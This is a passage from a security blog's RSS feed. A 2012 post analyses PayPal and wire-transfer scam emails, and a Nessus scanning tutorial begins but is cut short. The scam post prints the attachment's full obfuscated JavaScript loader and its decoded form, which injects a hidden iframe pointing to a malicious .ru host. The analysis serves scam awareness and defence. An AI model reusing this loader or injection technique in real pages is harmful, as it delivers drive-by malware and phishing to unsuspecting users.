&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=JxclfiiypIU:g_K9eptNzXg:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=JxclfiiypIU:g_K9eptNzXg:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=JxclfiiypIU:g_K9eptNzXg:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=JxclfiiypIU:g_K9eptNzXg:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=JxclfiiypIU:g_K9eptNzXg:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/JxclfiiypIU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/JxclfiiypIU/anonbinthe-anonymous-alternate-of.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-QqQQFQPBIyU/T5PO87UBbzI/AAAAAAAABJw/613jQMksw6w/s72-c/anon.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/04/anonbinthe-anonymous-alternate-of.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-5278057881419715248</guid><pubDate>Sat, 21 Apr 2012 15:45:00 +0000</pubDate><atom:updated>2012-04-21T08:45:41.681-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Scam Alert</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">News</category><category domain="http://www.blogger.com/atom/ns#">Hacking</category><category domain="http://www.blogger.com/atom/ns#">Random</category><title>PayPal &amp; Wire Transfer Scam - Email Scam</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/GaRjYSj0tEicNf8nSbAMQ-Lokks/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GaRjYSj0tEicNf8nSbAMQ-Lokks/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/GaRjYSj0tEicNf8nSbAMQ-Lokks/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/GaRjYSj0tEicNf8nSbAMQ-Lokks/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;

&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;


 
 
 
 &lt;/span&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
&lt;/style&gt;


 
 
 
 &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;

&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.ehacking.net/2012/04/paypal-wire-transfer-scam-email-scam.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://2.bp.blogspot.com/-G8GkCK1pZAs/T5LVPsnkd2I/AAAAAAAABIw/KWV50SeEeRI/s200/scam-alert.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;Scammer
are active and they usually active to make an innocent fool and to
steal the confidential information and money, every day thousands of
email are sending by the spammer an email filter can easily filter
these email and spam them like the powerful spam filter of gmail and
yahoo but sometimes the spammers uses some new techniques to bypass
these filters. &amp;nbsp;Now a day the private email exchange server
(private company email servers) are the target of these spammers.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;span style="color: black;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;You
might have heard about the spamming on social media channels like
&lt;a href="http://www.ehacking.net/search/label/Scam%20Alert" style="color: blue;"&gt;facebook spam&lt;/a&gt;, LinkedIn spam and so on, the danger situation is the
spam email that has an ability to steal the financial information of
the victim, look at this scam below&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;/div&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-RRLZj4YZSD4/T5LUC82dNeI/AAAAAAAABIY/yvXVMcyB_Do/s1600/paypalscam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="311" src="http://1.bp.blogspot.com/-RRLZj4YZSD4/T5LUC82dNeI/AAAAAAAABIY/yvXVMcyB_Do/s400/paypalscam.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;span style="color: black;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;I
have just received an email, a paypal spam email. We can easily say
that this is not a legitimate email because it starts with “Dear
Pay Pal user” but paypal always writes the name of the customer.
You can see that the spammers has just put the hyper link on some
text, the links are not the paypal links but the spammer website
links, the target website might have some malware or a phishing page
of paypal or it simply redirect you to another website.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;span style="color: black;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;The
second email from the spammer is wire transfer email, look at the
picture:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-LuiF4YsEiwg/T5LUZbCfAUI/AAAAAAAABIg/ud4VaQ2gMrI/s1600/wiretrns.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="348" src="http://1.bp.blogspot.com/-LuiF4YsEiwg/T5LUZbCfAUI/AAAAAAAABIg/ud4VaQ2gMrI/s400/wiretrns.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: black;"&gt;&lt;span style="text-decoration: none;"&gt;&lt;span style="font-style: normal;"&gt;&lt;span style="background: none repeat scroll 0% 0% transparent;"&gt;The
spammers has attached a HTML file and said that this is the Internet
explorer file, means they want receiver to open it on Internet
explorer, since IE more vulnerable then other browsers so the more
chance of success.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Lets
analyze it:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;This
is the HTML file that contain the code:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq" style="font-family: inherit;"&gt;
&lt;div style="color: #444444; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&amp;lt;html&amp;gt;
 &amp;lt;head&amp;gt;   &amp;lt;meta http-equiv="Content-Type"
content="text/html; charset=utf-8"&amp;gt;
&amp;lt;title&amp;gt;page15&amp;lt;/title&amp;gt;  &amp;lt;/head&amp;gt;  &amp;lt;body&amp;gt;&amp;lt;style&amp;gt;
body { margin: 0;} #iframe_box {position: absolute;   overflow: auto;
  margin: 0;   width: 100%;   height: 100%;}  &amp;lt;/style&amp;gt; 
&amp;lt;script&amp;gt;c=3-1;i=-2+c;if(parseInt("0"+"1"+"2"+"3")===83)try{Boolean().prototype.q}catch(egewgsd){if(window.document)f=['-30i78i57i74i-8i58i71i80i-8i21i-8i60i71i59i77i69i61i70i76i6i59i74i61i57i76i61i29i68i61i69i61i70i76i0i-1i65i62i74i57i69i61i-1i1i19i-8i-30i58i71i80i6i65i60i-8i21i-8i-1i65i62i74i57i69i61i55i58i71i80i-1i19i-8i-30i58i71i80i6i75i74i59i-8i21i-8i-1i64i76i76i72i18i7i7i79i65i75i67i71i70i75i65i70i76i72i57i74i57i6i74i77i18i16i8i16i8i7i65i69i63i7i23i72i74i71i69i71i21i70i57i59i64i57i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i75i76i81i68i61i6i71i78i61i74i62i68i71i79i-8i21i-8i-1i64i65i60i60i61i70i-1i19i-8i-30i60i71i59i77i69i61i70i76i6i58i71i60i81i6i57i72i72i61i70i60i27i64i65i68i60i0i58i71i80i1i19'][0].split('i');v="ev"+"a"+"l";}if(v)e=window[v];w=f;s=[];r=String;for(;204!=i;i+=1){j=i;s=s+r["f"+"r"+"omC"+"har"+"Code"](w[j]*1+40);}
if(v)z=s;e(z);&amp;lt;/script&amp;gt;&amp;lt;/body&amp;gt; &amp;lt;/html&amp;gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;It
seems to be the Java code and I have decrypted it:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;/div&gt;
&lt;blockquote class="tr_bq" style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;span style="color: #444444;"&gt;//eval
 var box = document.createElement('iframe');  box.id = 'iframe_box'; 
box.src = 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; 
document.body.style.overflow = 'hidden'; 
document.body.appendChild(box); //jsunpack.called CreateElement
iframe  //jsunpack.url http://wiskonsintpara.ru:8080/img/?promo=nacha
//jsunpack.url var s =  var box = document.createElement('iframe'); 
box.id = 'iframe_box';  box.src =
'http://wiskonsintpara.ru:8080/img/?promo=nacha'; 
document.body.style.overflow = 'hidden'; 
document.body.appendChild(box);  //jsunpack.url var z =  var box =
document.createElement('iframe');  box.id = 'iframe_box';  box.src =
'http://wiskonsintpara.ru:8080/img/?promo=nacha'; 
document.body.style.overflow = 'hidden'; 
document.body.appendChild(box);  //jsunpack.url var newurl =  var box
= document.createElement('iframe');  box.id = 'iframe_box';  box.src
= 'http://wiskonsintpara.ru:8080/img/?promo=nacha'; 
document.body.style.overflow = 'hidden'; 
document.body.appendChild(box); &lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;It
is some sort of the iframe injection attack and the final destination
or URL is &lt;/b&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq" style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;//jsunpack.called
CreateElement iframe  //jsunpack.url
http://wiskonsintpara.ru:8080/img/?promo=nacha &lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="color: #444444; font-family: inherit; margin-bottom: 0in;"&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;It
is not a bank website but a URL of the malicious website. &lt;/b&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;So
the conclusion is very simple never trust on any malicious email
because such a emails are nothing but a way to steal your money,
educate the people around you because the security awareness is only
the possible way of online security.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="font-family: inherit; font-size: small;"&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: inherit; margin-bottom: 0in;"&gt;
&lt;/div&gt;
&lt;div dir="ltr" style="font-family: inherit; text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;
&lt;/script&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;fb:like href="http://www.ehacking.net/" show_faces="true" width="450"&gt;&lt;/fb:like&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="color: red;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Note: If you want to learn more about Linux and Windows based Penetration testing, you might want to subscribe our &lt;a href="http://feeds.feedburner.com/ehacking"&gt;RSS feed&lt;/a&gt; and &lt;a href="http://feedburner.google.com/fb/a/mailverify?uri=ehacking&amp;amp;loc=en_US"&gt;Email Subscription&lt;/a&gt;&amp;nbsp; or become our &lt;a href="http://www.facebook.com/Beautyofthebaud"&gt;Facebook fan&lt;/a&gt;! You will get all the latest updates at both the places.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3964176871415674890-5278057881419715248?l=www.ehacking.net' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=A2NumDjdnk8:zNToMvoSXmc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=A2NumDjdnk8:zNToMvoSXmc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=A2NumDjdnk8:zNToMvoSXmc:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?i=A2NumDjdnk8:zNToMvoSXmc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/ehacking?a=A2NumDjdnk8:zNToMvoSXmc:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/ehacking?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/ehacking/~4/A2NumDjdnk8" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/ehacking/~3/A2NumDjdnk8/paypal-wire-transfer-scam-email-scam.html</link><author>noreply@blogger.com (Irfan Shakeel)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-G8GkCK1pZAs/T5LVPsnkd2I/AAAAAAAABIw/KWV50SeEeRI/s72-c/scam-alert.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.ehacking.net/2012/04/paypal-wire-transfer-scam-email-scam.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3964176871415674890.post-5298045232263836490</guid><pubDate>Mon, 16 Apr 2012 15:14:00 +0000</pubDate><atom:updated>2012-04-16T08:15:12.782-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Tutorial</category><category domain="http://www.blogger.com/atom/ns#">Nessus</category><category domain="http://www.blogger.com/atom/ns#">Pen-Testing</category><category domain="http://www.blogger.com/atom/ns#">EH Security</category><category domain="http://www.blogger.com/atom/ns#">Vulnerability</category><title>Vulnerability Assessment &amp; Scanning Nessus Tutorial</title><description>&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/yan616r1MdUoTtO-Z8P8ui6K6sA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yan616r1MdUoTtO-Z8P8ui6K6sA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/yan616r1MdUoTtO-Z8P8ui6K6sA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/yan616r1MdUoTtO-Z8P8ui6K6sA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div style="font-family: inherit;"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.ehacking.net/2012/04/vulnerability-assessment-scanning.html" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-fgHNjj5Xb5w/T4w2wiRltAI/AAAAAAAABII/jevlr_f5zEU/s200/nessus.jpg" width="220" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;This is the second part of &lt;a href="http://www.infosecinstitute.com/courses/it-audit.html" style="color: blue;" target="_blank"&gt;IT auditing&lt;/a&gt; and fundamentals, the first part of this article has been discussed on the &lt;a href="http://www.ehacking.net/2012/04/it-auditing-fundamentals-theoretical-to.html" style="color: blue;"&gt;previous issue&lt;/a&gt;. &lt;/b&gt;&lt;/span&gt;          &lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div align="LEFT" style="font-family: inherit; font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;What is nessus? What nessus can do ? And other similar question has been discussed above but from this point I will demonstrate you the best feature of nessus with some examples. Keep in mind that nessus are available into two feeds one is a home feed while other is for professional (you need to purchase it), figure 6 show you to simple interface of nessus.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; font-family: inherit; text-align: center;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;a href="http://4.bp.blogspot.com/-K9WmyJvMzS8/T4wsvHMftZI/AAAAAAAABHw/hVDRlmefmKo/s1600/figure+6.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="172" src="http://4.bp.blogspot.com/-K9WmyJvMzS8/T4wsvHMftZI/AAAAAAAABHw/hVDRlmefmKo/s640/figure+6.jpg" width="640" /&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style="font-family: inherit;"&gt;&lt;style type="text/css"&gt;
 &lt;!--
  @page { margin: 0.79in }
  P { margin-bottom: 0.08in }
 --&gt;
 
&lt;/style&gt;  &lt;/div&gt;&lt;div align="LEFT" style="font-family: inherit; font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-family: inherit; font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Whether you are using home feed or professional feed there is a four policies exist by default and they are:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div align="LEFT" style="font-family: inherit; font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;ul style="font-family: inherit;"&gt;&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Eternal network scan&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Internal network scan&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Prepare for PCI DSS audit&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;&lt;div align="LEFT" style="font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: black;"&gt;Web app test&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div align="LEFT" style="font-family: inherit; font-weight: normal; margin-bottom: 0in; text-decoration: none;"&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;br /&gt;
